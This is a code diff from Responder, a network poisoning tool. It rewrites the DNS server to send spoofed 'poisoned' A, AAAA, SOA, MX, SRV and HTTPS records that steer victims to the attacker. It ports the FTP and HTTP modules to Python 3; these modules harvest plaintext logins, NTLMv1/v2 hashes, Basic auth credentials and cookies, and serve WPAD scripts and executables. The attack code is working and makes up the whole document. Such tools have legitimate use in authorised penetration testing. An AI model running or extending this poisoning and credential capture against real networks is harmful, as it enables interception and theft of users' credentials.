+		try:
+			# Skip any answer/authority records to get to additional section
+			# For simplicity, we'll scan for OPT record (TYPE=41)
+			
+			while offset < len(data):
+				# Check if we're at a name
+				if offset >= len(data):
+					return None
+				
+				# Skip name (could be label or pointer)
+				name_start = offset
+				while offset < len(data):
+					length = data[offset]
+					if length == 0:
+						offset += 1
+						break
+					if (length & 0xC0) == 0xC0:
+						offset += 2
+						break
+					offset += length + 1
+				
+				# Check if we have enough data for type, class, ttl, rdlength
+				if offset + 10 > len(data):
+					return None
+				
+				rr_type = struct.unpack('>H', data[offset:offset+2])[0]
+				offset += 2
+				
+				if rr_type == 41:  # OPT record found
+					udp_payload_size = struct.unpack('>H', data[offset:offset+2])[0]
+					offset += 2
+					
+					# TTL field contains extended RCODE and flags
+					ttl_bytes = data[offset:offset+4]
+					extended_rcode = ttl_bytes[0]
+					edns_version = ttl_bytes[1]
+					flags = struct.unpack('>H', ttl_bytes[2:4])[0]
+					dnssec_ok = bool(flags & 0x8000)  # DO bit
+					offset += 4
+					
+					rdlength = struct.unpack('>H', data[offset:offset+2])[0]
+					offset += 2
+					
+					# RDATA contains option codes (we'll just skip for now)
+					rdata = data[offset:offset+rdlength] if rdlength > 0 else b''
+					
+					return {
+						'udp_size': udp_payload_size,
+						'extended_rcode': extended_rcode,
+						'edns_version': edns_version,
+						'dnssec_ok': dnssec_ok,
+						'rdata': rdata
+					}
+				else:
+					# Skip this RR
+					offset += 2  # class
+					offset += 4  # ttl
+					if offset + 2 > len(data):
+						return None
+					rdlength = struct.unpack('>H', data[offset:offset+2])[0]
+					offset += 2 + rdlength
+			
+			return None
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error parsing OPT record: %s' % str(e)))
 			return None
 	
+	def should_respond(self, query_name, query_type):
+		"""Determine if we should respond to this DNS query"""
+		
+		# Don't respond to empty queries
+		if not query_name:
+			return False
+		
+		# Domain filtering - only respond to configured domain if set
+		if hasattr(settings.Config, 'DHCPv6_Domain') and settings.Config.DHCPv6_Domain:
+			target_domain = settings.Config.DHCPv6_Domain.lower().strip()
+			query_lower = query_name.lower().strip('.')
+			
+			# Check if query matches domain or is a subdomain
+			if not (query_lower == target_domain or query_lower.endswith('.' + target_domain)):
+				if settings.Config.Verbose:
+					print(text('[DNS] Ignoring query for %s (not in target domain %s)' % (
+						query_name, target_domain)))
+				return False
+			
+			# Log that we're responding to a filtered domain
+			if settings.Config.Verbose:
+				print(color('[DNS] Query matches target domain %s - responding' % target_domain, 3, 1))
+		
+		# For AAAA queries, only respond if we have a valid IPv6 address
+		# With link-local fallback, this should almost always succeed
+		# Only fails if IPv6 is completely disabled on the system
+		if query_type == 28:  # AAAA
+			ipv6 = self.get_ipv6_address()
+			if not ipv6:
+				return False
+		
+		# Respond to these query types:
+		# A (1), SOA (6), MX (15), TXT (16), AAAA (28), SRV (33), ANY (255)
+		# SVCB (64), HTTPS (65) - Service Binding records
+		supported_types = [1, 6, 15, 16, 28, 33, 64, 65, 255]
+		if query_type not in supported_types:
+			return False
+		
+		# Log interesting queries (authentication-related domains)
+		query_lower = query_name.lower()
+		interesting_patterns = ['login', 'auth', 'sso', 'portal', 'vpn', 'mail', 'smtp', 'imap', 'exchange', '_ldap', '_kerberos', '_gc', '_kpasswd', '_msdcs']
+		if any(pattern in query_lower for pattern in interesting_patterns):
+			SaveToDb({
+				'module': 'DNS',
+				'type': 'Interesting-Query',
+				'client': self.client_address[0].replace('::ffff:', ''),
+				'hostname': query_name,
+				'fullhash': query_name
+			})
+		
+		# Respond to everything that passed the filters
+		return True
+	
+	def build_response(self, transaction_id, query_name, query_type, query_class, original_data, opt_record=None):
+		"""Build DNS response packet with optional OPT record support"""
 		try:
-			data = self.request.recv(1024)
+			# DNS Header
+			response = transaction_id  # Transaction ID
+			
+			# Flags: Response, Authoritative, No error
+			flags = 0x8400  # Standard query response, authoritative
+			response += struct.pack('>H', flags)
+			
+			# Questions, Answers, Authority RRs, Additional RRs
+			response += struct.pack('>H', 1)  # 1 question
+			response += struct.pack('>H', 1)  # 1 answer
+			response += struct.pack('>H', 0)  # 0 authority
+			
+			# Additional RRs count (1 if we have OPT record)
+			additional_count = 1 if opt_record else 0
+			response += struct.pack('>H', additional_count)
+			
+			# Question section (copy from original query)
+			# Find question section in original data
+			question_start = 12
+			question_end = question_start
+			
+			# Skip to end of domain name
+			while question_end < len(original_data):
+				length = original_data[question_end]
+				if length == 0:
+					question_end += 5  # null byte + type (2) + class (2)
+					break
+				if (length & 0xC0) == 0xC0:
+					question_end += 6  # pointer (2) + type (2) + class (2)
+					break
+				question_end += length + 1
+			
+			question_section = original_data[question_start:question_end]
+			response += question_section
+			
+			# Answer section
+			# Name (pointer to question)
+			response += b'\xc0\x0c'  # Pointer to offset 12 (question name)
+			
+			# Type
+			response += struct.pack('>H', query_type)
+			
+			# Class
+			response += struct.pack('>H', query_class)
+			
+			# TTL (5 minutes for better caching while still allowing updates)
+			response += struct.pack('>I', 300)  # 300 seconds = 5 minutes
+			
+			# Get target IP for A records
+			target_ipv4 = self.get_ipv4_address()
+			
+			if query_type == 1:  # A record
+				# RDLENGTH
+				response += struct.pack('>H', 4)
+				# RDATA (IPv4 address)
+				response += socket.inet_aton(target_ipv4)
+			
+			elif query_type == 28:  # AAAA record
+				# Get proper IPv6 address (already validated in should_respond)
+				ipv6 = self.get_ipv6_address()
+				if not ipv6:
+					return None  # Should not happen if should_respond worked
+				
+				# RDLENGTH
+				response += struct.pack('>H', 16)
+				# RDATA (IPv6 address)
+				response += socket.inet_pton(socket.AF_INET6, ipv6)
+			
+			elif query_type == 6:  # SOA record (Start of Authority)
+				# Build SOA record to appear authoritative
+				# SOA format: MNAME RNAME SERIAL REFRESH RETRY EXPIRE MINIMUM
+				
+				# MNAME (primary nameserver) - pointer to query name
+				soa_data = b'\xc0\x0c'
+				
+				# RNAME (responsible party) - admin@<domain>
+				# Format: admin.<domain> (@ becomes .)
+				soa_data += b'\x05admin\xc0\x0c'  # admin + pointer to query name
+				
+				# SERIAL (zone serial number)
+				import time
+				serial = int(time.time()) % 2147483647  # Use timestamp as serial
+				soa_data += struct.pack('>I', serial)
+				
+				# REFRESH (32-bit seconds) - how often secondary checks for updates
+				soa_data += struct.pack('>I', 120)  # 2 minutes
+				
+				# RETRY (32-bit seconds) - retry interval if refresh fails
+				soa_data += struct.pack('>I', 60)  # 1 minute
+				
+				# EXPIRE (32-bit seconds) - when zone data becomes invalid
+				soa_data += struct.pack('>I', 300)  # 5 minutes
+				
+				# MINIMUM (32-bit seconds) - minimum TTL for negative caching
+				soa_data += struct.pack('>I', 60)  # 60 seconds
+				
+				response += struct.pack('>H', len(soa_data))
+				response += soa_data
+				
+				if settings.Config.Verbose:
+					print(color('[DNS] SOA record poisoned - appearing as authoritative', 3, 1))
+			
+			elif query_type == 15:  # MX record (mail server)
+				# Build MX record pointing to our server
+				# This captures SMTP auth attempts
+				mx_data = struct.pack('>H', 10)  # Priority 10
+				mx_data += b'\xc0\x0c'  # Pointer to query name (our server)
+				
+				response += struct.pack('>H', len(mx_data))
+				response += mx_data
+				
+				if settings.Config.Verbose:
+					print(color('[DNS] MX record poisoned - potential email auth capture', 3, 1))
+			
+			elif query_type == 16:  # TXT record
+				# Return a benign TXT record
+				txt_data = b'v=spf1 a mx ~all'  # SPF record
+				response += struct.pack('>H', len(txt_data) + 1)
+				response += struct.pack('B', len(txt_data))
+				response += txt_data
+			
+			elif query_type == 33:  # SRV record (service discovery)
+				# SRV format: priority, weight, port, target
+				# Determine correct port based on service name in query
+				srv_port = self.get_srv_port(query_name)
+				
+				srv_data = struct.pack('>HHH', 0, 0, srv_port)  # priority, weight, port
+				srv_data += b'\xc0\x0c'  # Target (pointer to query name)
+				
+				response += struct.pack('>H', len(srv_data))
+				response += srv_data
+				
+				if settings.Config.Verbose:
+					print(color('[DNS] SRV record poisoned: %s -> port %d' % (query_name, srv_port), 3, 1))
+			
+			elif query_type == 255:  # ANY query
+				# Respond with A record
+				response += struct.pack('>H', 4)
+				response += socket.inet_aton(target_ipv4)
+			
+			elif query_type == 64 or query_type == 65:  # SVCB (64) or HTTPS (65) record
+				# Service Binding records - respond with alias to same domain
+				# This tells clients to use A/AAAA records for the service
+				# SVCB format: priority, target, params
+				
+				# Priority 0 = AliasMode (just use A/AAAA of target)
+				svcb_data = struct.pack('>H', 0)  # Priority 0 (alias)
+				# Target: pointer to query name (use our domain)
+				svcb_data += b'\xc0\x0c'  # Pointer to query name
+				
+				response += struct.pack('>H', len(svcb_data))
+				response += svcb_data
+				
+				if settings.Config.Verbose:
+					record_type = 'HTTPS' if query_type == 65 else 'SVCB'
+					print(color('[DNS] %s record poisoned - alias mode' % record_type, 3, 1))
+			
+			# Add OPT record to additional section if client sent one
+			if opt_record:
+				response += self.build_opt_record(opt_record)
+			
+			return response
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error building response: %s' % str(e)))
+			return None
+	
+	def build_opt_record(self, client_opt):
+		"""
+		Build OPT pseudo-RR for EDNS0 response
+		
+		This indicates our server supports EDNS0 extensions
+		"""
+		try:
+			opt_rr = b''
+			
+			# NAME: root domain (empty)
+			opt_rr += b'\x00'
+			
+			# TYPE: OPT (41)
+			opt_rr += struct.pack('>H', 41)
+			
+			# CLASS: UDP payload size we support (typically 4096 or 512)
+			# Match client's size or use reasonable default
+			udp_size = min(client_opt['udp_size'], 4096) if client_opt['udp_size'] > 512 else 4096
+			opt_rr += struct.pack('>H', udp_size)
+			
+			# TTL: Extended RCODE and flags
+			# Byte 0: Extended RCODE (0 = no error)
+			# Byte 1: EDNS version (0)
+			# Bytes 2-3: Flags (we don't set DNSSEC OK in response)
+			extended_rcode = 0
+			edns_version = 0
+			flags = 0  # No flags set (we don't support DNSSEC)
+			
+			opt_rr += struct.pack('B', extended_rcode)
+			opt_rr += struct.pack('B', edns_version)
+			opt_rr += struct.pack('>H', flags)
+			
+			# RDLENGTH: 0 (no additional options)
+			opt_rr += struct.pack('>H', 0)
+			
+			# RDATA: empty (no options)
+			
+			if settings.Config.Verbose:
+				print(color('[DNS] Added OPT record to response (EDNS0)', 4, 1))
+			
+			return opt_rr
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error building OPT record: %s' % str(e)))
+			return b''
+	
+	def get_target_ip(self, query_type):
+		"""Get the target IP address for spoofed responses"""
+		if query_type == 28:  # AAAA
+			return self.get_ipv6_address()
+		else:  # A record and others
+			return self.get_ipv4_address()
+	
+	def get_ipv4_address(self):
+		"""Get IPv4 address for A record responses"""
+		# Priority 1: Use ExternalIP if set (-e option)
+		if hasattr(settings.Config, 'ExternalIP') and settings.Config.ExternalIP:
+			return settings.Config.ExternalIP
+		
+		# Priority 2: Use Bind_To (default)
+		return settings.Config.Bind_To
+	
+	def get_ipv6_address(self):
+		"""
+		Get IPv6 address for AAAA responses
+		
+		Returns the IPv6 address Responder is configured to use:
+		1. ExternalIP6 if set (-6 command line option)
+		2. Bind_To6 (already determined by FindLocalIP6 at startup)
+		
+		Does NOT return IPv4-mapped addresses (::ffff:x.x.x.x) or localhost.
+		"""
+		# Priority 1: Use ExternalIP6 if set (-6 command line option)
+		if hasattr(settings.Config, 'ExternalIP6') and settings.Config.ExternalIP6:
+			ipv6 = settings.Config.ExternalIP6
+			if ipv6 and ipv6 not in ('::1', '') and not ipv6.startswith('::ffff:'):
+				return ipv6
+		
+		# Priority 2: Use Bind_To6 (set by FindLocalIP6 at startup)
+		if hasattr(settings.Config, 'Bind_To6') and settings.Config.Bind_To6:
+			ipv6 = settings.Config.Bind_To6
+			if ipv6 and ipv6 not in ('::1', '::') and not ipv6.startswith('::ffff:'):
+				return ipv6
+		
+		# No valid IPv6 available
+		return None
+	
+	def get_type_name(self, query_type):
+		"""Convert query type number to name"""
+		types = {
+			1: 'A',
+			2: 'NS',
+			5: 'CNAME',
+			6: 'SOA',
+			12: 'PTR',
+			15: 'MX',
+			16: 'TXT',
+			28: 'AAAA',
+			33: 'SRV',
+			41: 'OPT',
+			64: 'SVCB',
+			65: 'HTTPS',
+			255: 'ANY'
+		}
+		return types.get(query_type, 'TYPE%d' % query_type)
+	
+	def get_srv_port(self, query_name):
+		"""
+		Determine the correct port for SRV record responses based on service name.
+		
+		SRV query format: _service._protocol.name
+		Examples:
+		  _ldap._tcp.dc._msdcs.domain.local → 389
+		  _kerberos._tcp.domain.local → 88
+		  _gc._tcp.domain.local → 3268
+		
+		Returns appropriate port for the service, defaults to 445 (SMB) if unknown.
+		"""
+		query_lower = query_name.lower()
+		
+		# Service to port mapping
+		# Format: (service_pattern, port)
+		srv_ports = [
+			# LDAP services
+			('_ldap._tcp', 389),
+			('_ldap._udp', 389),
+			('_ldaps._tcp', 636),
+			
+			# Kerberos services
+			('_kerberos._tcp', 88),
+			('_kerberos._udp', 88),
+			('_kerberos-master._tcp', 88),
+			('_kerberos-master._udp', 88),
+			('_kpasswd._tcp', 464),
+			('_kpasswd._udp', 464),
+			('_kerberos-adm._tcp', 749),
+			
+			# Global Catalog (Active Directory)
+			('_gc._tcp', 3268),
+			('_gc._ssl._tcp', 3269),
+			
+			# Web services
+			('_http._tcp', 80),
+			('_https._tcp', 443),
+			('_http._ssl._tcp', 443),
+			
+			# Email services
+			('_smtp._tcp', 25),
+			('_submission._tcp', 587),
+			('_imap._tcp', 143),
+			('_imaps._tcp', 993),
+			('_pop3._tcp', 110),
+			('_pop3s._tcp', 995),
+			
+			# File/Remote services
+			('_smb._tcp', 445),
+			('_cifs._tcp', 445),
+			('_ftp._tcp', 21),
+			('_sftp._tcp', 22),
+			('_ssh._tcp', 22),
+			('_telnet._tcp', 23),
+			('_rdp._tcp', 3389),
+			('_ms-wbt-server._tcp', 3389),  # RDP
+			
+			# Windows services
+			('_winrm._tcp', 5985),
+			('_winrm-ssl._tcp', 5986),
+			('_wsman._tcp', 5985),
+			('_ntp._udp', 123),
+			
+			# Database services
+			('_mssql._tcp', 1433),
+			('_mysql._tcp', 3306),
+			('_postgresql._tcp', 5432),
+			('_oracle._tcp', 1521),
+			
+			# SIP/VoIP
+			('_sip._tcp', 5060),
+			('_sip._udp', 5060),
+			('_sips._tcp', 5061),
+			
+			# XMPP/Jabber
+			('_xmpp-client._tcp', 5222),
+			('_xmpp-server._tcp', 5269),
+			
+			# Other
+			('_finger._tcp', 79),
+			('_ipp._tcp', 631),  # Internet Printing Protocol
+		]
+		
+		# Check each pattern
+		for pattern, port in srv_ports:
+			if query_lower.startswith(pattern):
+				return port
+		
+		# Default to SMB port for unknown services
+		# This is a reasonable default for credential capture
+		return 445
 
-			if ParseDNSType(data) and settings.Config.AnalyzeMode is False:
-				buff = DNS_Ans()
-				buff.calculate(data)
-				self.request.send(str(buff))
 
-				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
-
-		except Exception:
-			pass
+class DNSTCP(BaseRequestHandler):
+	"""
+	DNS over TCP server
+	Handles TCP-based DNS queries (zone transfers, large responses)
+	"""
+	
+	def handle(self):
+		try:
+			# TCP DNS messages are prefixed with 2-byte length
+			length_data = self.request.recv(2)
+			if len(length_data) < 2:
+				return
+			
+			msg_length = struct.unpack('>H', length_data)[0]
+			
+			# Receive the DNS message
+			data = b''
+			while len(data) < msg_length:
+				chunk = self.request.recv(msg_length - len(data))
+				if not chunk:
+					return
+				data += chunk
+			
+			if len(data) < 12:
+				return
+			
+			# Parse DNS header
+			transaction_id = data[0:2]
+			flags = struct.unpack('>H', data[2:4])[0]
+			questions = struct.unpack('>H', data[4:6])[0]
+			answer_rrs = struct.unpack('>H', data[6:8])[0]
+			authority_rrs = struct.unpack('>H', data[8:10])[0]
+			additional_rrs = struct.unpack('>H', data[10:12])[0]
+			
+			# Check if it's a query
+			if flags & 0x8000:
+				return
+			
+			# Create DNS instance to reuse parsing logic
+			dns_handler = DNS.__new__(DNS)
+			dns_handler.client_address = self.client_address
+			
+			# Parse question
+			query_name, query_type, query_class, offset = dns_handler.parse_question(data, 12)
+			
+			if not query_name:
+				return
+			
+			# Check for OPT record
+			opt_record = None
+			if additional_rrs > 0:
+				opt_record = dns_handler.parse_opt_record(data, offset)
+			
+			# Log the query
+			if settings.Config.Verbose:
+				query_type_name = dns_handler.get_type_name(query_type)
+				opt_info = ''
+				if opt_record:
+					opt_info = ' [EDNS0: UDP=%d]' % opt_record['udp_size']
+				print(text('[DNS-TCP] Query from %s: %s (%s)%s' % (
+					self.client_address[0].replace('::ffff:', ''),
+					query_name,
+					query_type_name,
+					opt_info
+				)))
+			
+			# Check if we should respond
+			if not dns_handler.should_respond(query_name, query_type):
+				return
+			
+			# Build response
+			response = dns_handler.build_response(
+				transaction_id,
+				query_name,
+				query_type,
+				query_class,
+				data,
+				opt_record
+			)
+			
+			if response:
+				# Prefix with length for TCP
+				tcp_response = struct.pack('>H', len(response)) + response
+				self.request.sendall(tcp_response)
+				
+				target_ip = dns_handler.get_target_ip(query_type)
+				if target_ip:
+					print(color('[DNS-TCP] Poisoned response: %s -> %s' % (
+						query_name, target_ip), 2, 1))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS-TCP] Error: %s' % str(e)))

servers/FTP.py

@@ -15,28 +15,30 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 from packets import FTPPacket
 
 class FTP(BaseRequestHandler):
 	def handle(self):
 		try:
-			self.request.send(str(FTPPacket()))
+			self.request.send(NetworkSendBufferPython2or3(FTPPacket()))
 			data = self.request.recv(1024)
 
-			if data[0:4] == "USER":
-				User = data[5:].strip()
+			if data[0:4] == b'USER':
+				User = data[5:].strip().decode("latin-1")
 
 				Packet = FTPPacket(Code="331",Message="User name okay, need password.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)
 
-			if data[0:4] == "PASS":
-				Pass = data[5:].strip()
-
+			if data[0:4] == b'PASS':
+				Pass = data[5:].strip().decode("latin-1")
 				Packet = FTPPacket(Code="530",Message="User not logged in.")
-				self.request.send(str(Packet))
-				data = self.request.recv(1024)
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 
 				SaveToDb({
 					'module': 'FTP', 
@@ -49,8 +51,9 @@ class FTP(BaseRequestHandler):
 
 			else:
 				Packet = FTPPacket(Code="502",Message="Command not implemented.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)
 
 		except Exception:
+			self.request.close()
 			pass

servers/HTTP.py

@@ -15,10 +15,13 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
-from SocketServer import BaseRequestHandler, StreamRequestHandler
-from base64 import b64decode
+import codecs
 from utils import *
-
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
 from packets import NTLM_Challenge
 from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer
 from packets import WPADScript, ServeExeFile, ServeHtmlFile
@@ -28,28 +31,29 @@ from packets import WPADScript, ServeExeFile, ServeHtmlFile
 def ParseHTTPHash(data, Challenge, client, module):
 	LMhashLen    = struct.unpack('<H',data[12:14])[0]
 	LMhashOffset = struct.unpack('<H',data[16:18])[0]
-	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	
 	NthashLen    = struct.unpack('<H',data[20:22])[0]
 	NthashOffset = struct.unpack('<H',data[24:26])[0]
-	NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	UserLen      = struct.unpack('<H',data[36:38])[0]
 	UserOffset   = struct.unpack('<H',data[40:42])[0]
-	User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
-
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
 	if NthashLen == 24:
 		HostNameLen     = struct.unpack('<H',data[46:48])[0]
 		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
-		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, Challenge.encode('hex'))
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
 		SaveToDb({
 			'module': module, 
 			'type': 'NTLMv1', 
 			'client': client, 
 			'host': HostName, 
 			'user': User, 
-			'hash': LMHash+":"+NTHash, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
 			'fullhash': WriteHash,
 		})
 
@@ -57,19 +61,18 @@ def ParseHTTPHash(data, Challenge, client, module):
 		NthashLen      = 64
 		DomainLen      = struct.unpack('<H',data[28:30])[0]
 		DomainOffset   = struct.unpack('<H',data[32:34])[0]
-		Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
 		HostNameLen    = struct.unpack('<H',data[44:46])[0]
 		HostNameOffset = struct.unpack('<H',data[48:50])[0]
-		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge.encode('hex'), NTHash[:32], NTHash[32:])
-                 
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
 		SaveToDb({
 			'module': module, 
 			'type': 'NTLMv2', 
 			'client': client, 
 			'host': HostName, 
 			'user': Domain + '\\' + User,
-			'hash': NTHash[:32] + ":" + NTHash[32:],
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
 			'fullhash': WriteHash,
 		})
 
@@ -79,50 +82,23 @@ def GrabCookie(data, host):
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1 and settings.Config.Verbose:
-			print text("[HTTP] Cookie           : %s " % Cookie)
+			print(text("[HTTP] Cookie           : %s " % Cookie))
 		return Cookie
 	return False
 
-def GrabHost(data, host):
-	Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
-
-	if Host:
-		Host = Host.group(0).replace('Host: ', '')
-		if settings.Config.Verbose:
-			print text("[HTTP] Host             : %s " % color(Host, 3))
-		return Host
-	return False
-
 def GrabReferer(data, host):
 	Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
 
 	if Referer:
 		Referer = Referer.group(0).replace('Referer: ', '')
 		if settings.Config.Verbose:
-			print text("[HTTP] Referer         : %s " % color(Referer, 3))
+			print(text("[HTTP] Referer         : %s " % color(Referer, 3)))
 		return Referer
 	return False
 
-def SpotFirefox(data):
-	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
-	if UserAgent:
-                print text("[HTTP] %s" % color("User-Agent        : "+UserAgent[0], 2))
-                IsFirefox = re.search('Firefox', UserAgent[0])
-                if IsFirefox:
-                        print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
-                        print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
-                        return True
-                else:
-	               return False
-
 def WpadCustom(data, client):
 	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
-	if Wpad and SpotFirefox(data):
-		Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
-		Buffer.calculate()
-		return str(Buffer)
-
-	if Wpad and SpotFirefox(data) == False:
+	if Wpad:
 		Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 		Buffer.calculate()
 		return str(Buffer)
@@ -145,17 +121,16 @@ def ServeOPTIONS(data):
 
 def ServeFile(Filename):
 	with open (Filename, "rb") as bk:
-		return bk.read()
+		return NetworkRecvBufferPython2or3(bk.read())
 
 def RespondWithFile(client, filename, dlname=None):
-	
 	if filename.endswith('.exe'):
 		Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
 	else:
 		Buffer = ServeHtmlFile(Payload = ServeFile(filename))
 
 	Buffer.calculate()
-	print text("[HTTP] Sending file %s to %s" % (filename, client))
+	print(text("[HTTP] Sending file %s to %s" % (filename, client)))
 	return str(Buffer)
 
 def GrabURL(data, host):
@@ -164,17 +139,18 @@ def GrabURL(data, host):
 	POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
 
 	if GET and settings.Config.Verbose:
-		print text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5)))
+		print(text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5))))
 
 	if POST and settings.Config.Verbose:
-		print text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5)))
+		print(text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5))))
 
 		if len(''.join(POSTDATA)) > 2:
-			print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
+			print(text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip()))
 
 # Handle HTTP packet sequence.
 def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
 
 	# Serve the .exe if needed
@@ -187,79 +163,110 @@ def PacketSequence(data, client, Challenge):
 
 	WPAD_Custom = WpadCustom(data, client)
         # Webdav
-        if ServeOPTIONS(data):
-                return ServeOPTIONS(data)
+	if ServeOPTIONS(data):
+		return ServeOPTIONS(data)
 
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-                print "Challenge 2:", Challenge.encode('hex')
-		if Packet_NTLM == "\x01":
+		if Packet_NTLM == b'\x01':
 			GrabURL(data, client)
-			GrabReferer(data, client)
-			GrabHost(data, client)
+			#GrabReferer(data, client)
 			GrabCookie(data, client)
 
-			Buffer = NTLM_Challenge(ServerChallenge=Challenge)
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()
 
-			Buffer_Ans = IIS_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(Buffer))
-			return str(Buffer_Ans)
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			Buffer_Ans.calculate()
+			return Buffer_Ans
 
-		if Packet_NTLM == "\x03":
+		if Packet_NTLM == b'\x03':
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-                        if IsWebDAV(data):
+			if IsWebDAV(data):
                                  module = "WebDAV"
-                        else:
+			else:
                                  module = "HTTP"
 			ParseHTTPHash(NTLM_Auth, Challenge, client, module)
 
 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
 
 				return WPAD_Custom
 			else:
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 				Buffer.calculate()
-				return str(Buffer)
+				return Buffer
+				
+	elif NTLM_Auth2:
+		Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if Packet_NTLM == b'\x01':
+			GrabURL(data, client)
+			#GrabReferer(data, client)
+			GrabCookie(data, client)
+
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			Buffer_Ans.calculate()
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			if IsWebDAV(data):
+                                 module = "WebDAV"
+			else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, Challenge, client, module)
+
+			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
+
+				return WPAD_Custom
+			else:
+				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+				Buffer.calculate()
+				return Buffer
 
 	elif Basic_Auth:
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
 
 		GrabURL(data, client)
-		GrabReferer(data, client)
-		GrabHost(data, client)
+		#GrabReferer(data, client)
 		GrabCookie(data, client)
 
 		SaveToDb({
 			'module': 'HTTP', 
 			'type': 'Basic', 
 			'client': client, 
